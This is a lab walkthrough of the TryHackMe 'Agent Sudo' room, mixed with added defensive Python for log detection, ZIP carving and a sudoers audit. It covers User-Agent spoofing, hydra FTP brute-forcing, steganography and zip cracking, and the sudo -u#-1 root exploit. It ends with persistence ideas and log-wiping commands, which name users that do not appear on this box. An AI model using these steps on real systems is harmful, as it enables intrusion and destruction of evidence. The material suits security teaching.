
THM:agentsudoctf

URL: https://tryhackme.com/room/agentsudoctf (Difficulty: Easy)

PHASE 1: Reconnaissance

Description of the room:

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Interesting ports found to be open:

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://xxx.xxx.xxx.xxx

Interesting folders found:

/index.php (Status: 200) [Size: 218]

Also see: gobuster.log

Running: nikto

Ran the following:

nikto -h xxx.xxx.xxx.xxx

Interesting info found:

--Nothing really--

Also see: nikto.log

PHASE 3: Gaining Access

Scanning didn't turn up anything too interesting, so we navigate to the web server running on this box and see:

Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R

Per the instructions on the main web page, you pass your agent codename as the User-Agent header to gain access. Since the note is signed by "R", we can systematically try the other letters. For example:

curl -H "User-Agent: C" -L http://10.10.13.116
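From the defender's side, the enumeration above leaves a recognisable trail: one client cycling through single-letter User-Agent values. As an added example (not part of the original writeup), this parses access-log lines in the Apache/nginx combined format and flags such clients; the log lines, timestamps and the 10.10.5.7 address are constructed samples.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format: ip ident user [ts] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SINGLE_LETTER_UA = re.compile(r"^[A-Za-z]$")

# Constructed sample lines (not the room's real logs): 10.10.2.14 walks through A, B, C
SAMPLE_LOG = [
    '10.10.2.14 - - [01/Oct/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 218 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.2.14 - - [01/Oct/2023:10:00:05 +0000] "GET / HTTP/1.1" 200 218 "-" "A"',
    '10.10.2.14 - - [01/Oct/2023:10:00:06 +0000] "GET / HTTP/1.1" 200 218 "-" "B"',
    '10.10.2.14 - - [01/Oct/2023:10:00:07 +0000] "GET / HTTP/1.1" 200 218 "-" "C"',
    '10.10.5.7 - - [01/Oct/2023:10:01:00 +0000] "GET / HTTP/1.1" 200 218 "-" "R"',
]


def parse_combined(line: str):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_ua_enumeration(lines, threshold: int = 3) -> dict:
    """Group single-letter User-Agent values by client IP.  A client that has sent
    at least `threshold` distinct letters is probing a User-Agent-gated page."""
    letters = defaultdict(set)
    for line in lines:
        rec = parse_combined(line)
        if rec and SINGLE_LETTER_UA.match(rec["ua"]):
            letters[rec["ip"]].add(rec["ua"].upper())
    return {ip: sorted(seen) for ip, seen in letters.items() if len(seen) >= threshold}
```

Lowering `threshold` to 1 also lists clients that sent a single codename, which is what a legitimate "agent" would look like, so the default only reports cycling.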

From that response, we learn the username behind agent "C" (chris). Since both SSH and FTP are running, let's try hydra against FTP with:

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.13.116 ftp

Sure enough, from that, we capture the FTP password for user chris.

Also see: hydra.log

Unprivileged Access

When we log into FTP as Chris, we have 3 files:

We find out from the text file:

Dear agent J,
All these alien like photos are fake! Agent R stored the real picture
inside your directory. Your login password is somehow stored in the fake
picture. It shouldn't be a problem for you.
From,
Agent C

By running:

steghide info ./cute-alien.jpg

We find that cute-alien.jpg contains password-protected embedded data. Using binwalk on the other image:

binwalk ./cutie.png

We can see there is a .zip file embedded within:

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22

So, we can do a:

binwalk -e ./cutie.png

to extract (-e) the hidden .zip file. That puts the embedded data into a _cutie.png.extracted subfolder. Inside, we have these files:

365
365.zlib
8702.zip
To_agentR.txt
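To show what binwalk is doing when it reports the offsets above, here is an added example (not code from the writeup or from binwalk) that signature-scans a file for ZIP local file headers, reads the entry name, sizes and encryption flag from each header, and carves the archive out through its end-of-central-directory record. The "image" is a constructed stand-in for cutie.png: PNG magic, filler bytes, then an unencrypted ZIP appended with the stdlib.

```python
import io
import struct
import zipfile

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"   # local file header signature
ZIP_EOCD = b"PK\x05\x06"           # end of central directory signature
SAMPLE_MESSAGE = "Agent C,\nconstructed sample message, not the room's real note\n"


def build_sample_image() -> bytes:
    """Constructed stand-in for cutie.png: PNG magic, filler, then a small ZIP
    appended (unencrypted, because the stdlib cannot write encrypted entries)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("To_agentR.txt", SAMPLE_MESSAGE)
    return PNG_MAGIC + b"\x00" * 300 + buf.getvalue()


def find_embedded_zips(data: bytes) -> list:
    """Signature scan, as binwalk does: parse every ZIP local file header for its
    name, sizes and the encryption bit (bit 0 of the general-purpose flags)."""
    found, pos = [], data.find(ZIP_LOCAL_HEADER)
    while pos != -1 and pos + 30 <= len(data):
        # sig(4) ver(2) flags(2) method(2) time(2) date(2) crc(4) csize(4) usize(4) nlen(2) xlen(2)
        flags, method, crc, csize, usize, nlen, xlen = struct.unpack_from("<HH4xIIIHH", data, pos + 6)
        name = data[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        found.append({"offset": pos, "name": name, "compressed_size": csize,
                      "uncompressed_size": usize, "encrypted": bool(flags & 1)})
        pos = data.find(ZIP_LOCAL_HEADER, pos + 4)
    return found


def carve_zip(data: bytes, start: int) -> bytes:
    """Carve from a local header through the EOCD record (22 bytes plus comment)."""
    eocd = data.find(ZIP_EOCD, start)
    if eocd == -1:
        raise ValueError("no end-of-central-directory record after offset %d" % start)
    comment_len = struct.unpack_from("<H", data, eocd + 20)[0]
    return data[start:eocd + 22 + comment_len]


def extract_embedded(data: bytes) -> dict:
    """Carve the first embedded ZIP and return {entry name: text} for its entries."""
    hits = find_embedded_zips(data)
    if not hits:
        return {}
    with zipfile.ZipFile(io.BytesIO(carve_zip(data, hits[0]["offset"]))) as zf:
        return {n: zf.read(n).decode() for n in zf.namelist()}
```

On the real cutie.png the header's encryption bit is set, which is why binwalk prints "encrypted" and the carved archive still needs the password before the entry can be read.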

The .zip file seems to be password-protected, so we can send that to John to crack:

zip2john ./8702.zip > ./8702.zip.hash

and then:

john ./8702.zip.hash

and very quickly, John finishes with the .zip file password:

Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
alien (8702.zip/To_agentR.txt)

Also see: john.log


Now that we have the .zip file password, we can unzip the contents:

7z e ./8702.zip

We enter the password and To_agentR.txt is extracted. Its contents give us an apparently encoded word:

Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R

Using a website like https://www.base64decode.org/, we can pass in the value QXJlYTUx and get the value Area51.

We might assume that is the steg password for the other image. We try that:

steghide extract -sf ./cute-alien.jpg

That writes its contents to message.txt, which is addressed to james and appears to contain his password.

Let's try that username and password over SSH. Sure enough, we can log in, grab the user flag, and retrieve the picture for the bonus question.

Privilege Escalation

We check whether we have any sudo privileges with sudo -l and see an odd entry:

(ALL, !root) /bin/bash

Looking this up online, we find the associated CVE-2019-14287.

To run the exploit, instead of the intuitive:

sudo /bin/bash

Per the CVE writeups, sudo before 1.8.28 does not match the user id -1 (4294967295 unsigned) against the !root exclusion, while the kernel treats setresuid(-1) as "leave unchanged", so the command still runs as root. You'd do the following to get a root prompt:

sudo -u#-1 /bin/bash
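For the defensive side of this finding, here is an added example (not from the writeup) that audits sudoers rules for the "(ALL, !root)" Runas pattern seen above, reports whether the installed sudo version predates the 1.8.28 fix, and scans sudo log entries for a target user of uid -1 / 4294967295. The sudoers lines, the log lines and their syslog layout are constructed samples for this example, not the room's real files.

```python
import re

# sudoers rule with a parenthesised Runas spec, e.g. "james ALL=(ALL, !root) /bin/bash"
RULE_RE = re.compile(r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>.+)$")
# sudo syslog line; the USER= field names the target user (line layout assumed for this example)
LOG_RE = re.compile(r"sudo:\s+(?P<who>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$")

SAMPLE_SUDOERS = [            # constructed sample, not the room's real /etc/sudoers
    "root    ALL=(ALL:ALL) ALL",
    "james   ALL=(ALL, !root) /bin/bash",
    "%sudo   ALL=(ALL:ALL) ALL",
]
SAMPLE_AUTH_LOG = [           # constructed sample lines
    "Oct  1 10:00:01 host sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=james ; COMMAND=/bin/bash",
    "Oct  1 10:00:09 host sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=#-1 ; COMMAND=/bin/bash",
]


def version_tuple(v: str) -> tuple:
    """'1.8.21p2' -> (1, 8, 21); only the first three numeric fields matter here."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def fixed_in_version(sudo_version: str) -> bool:
    """CVE-2019-14287 was fixed in sudo 1.8.28."""
    return version_tuple(sudo_version) >= (1, 8, 28)


def audit_rules(sudoers_lines, sudo_version: str) -> list:
    """Flag Runas specs that start with ALL but exclude root.  On an unfixed sudo,
    -u#-1 yields uid 4294967295, which '!root' does not match, yet the kernel treats
    setresuid(-1) as 'leave unchanged', so the command keeps sudo's uid 0."""
    findings = []
    for line in sudoers_lines:
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_users = [p.strip() for p in m.group("runas").split(":")[0].split(",")]
        if runas_users[0] == "ALL" and any(p in ("!root", "!#0") for p in runas_users[1:]):
            findings.append({"user": m.group("user"), "cmd": m.group("cmd").strip(),
                             "exploitable": not fixed_in_version(sudo_version)})
    return findings


def suspicious_log_lines(log_lines) -> list:
    """Return (invoking user, command) for sudo entries whose target is uid -1 / 4294967295."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and m.group("target").lstrip("#") in ("-1", "4294967295"):
            hits.append((m.group("who"), m.group("cmd").strip()))
    return hits
```

The fix is twofold: upgrade sudo to 1.8.28 or later, and rewrite the rule so it names the users that are allowed rather than excluding root from ALL.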

PHASE 4: Maintaining Access

This is a test/CTF machine, so this is out of scope. However, in a Red Team scenario, we could:

  • Add SSH key to /root/.ssh/authorized_keys
  • Create a privileged account that wouldn't draw attention (e.g. operations), or an unprivileged account and give it sudo access via a group or directly in the /etc/sudoers file.
  • Install some other backdoor or service.

PHASE 5: Clearing Tracks

This is a test machine. However, in a Red Team scenario, we could:

  • Delete relevant logs from /var/log/, although that might draw attention:

rm -Rf /var/log/*

  • Search and replace our IP address in all logs via:

find /var/log -name "*" -exec sed -i 's/10.10.2.14/127.0.0.1/g' {} \;

  • Wipe bash history for any accounts we used via:

cat /dev/null > /root/.bash_history

cat /dev/null > /home/kathy/.bash_history

cat /dev/null > /home/sam/.bash_history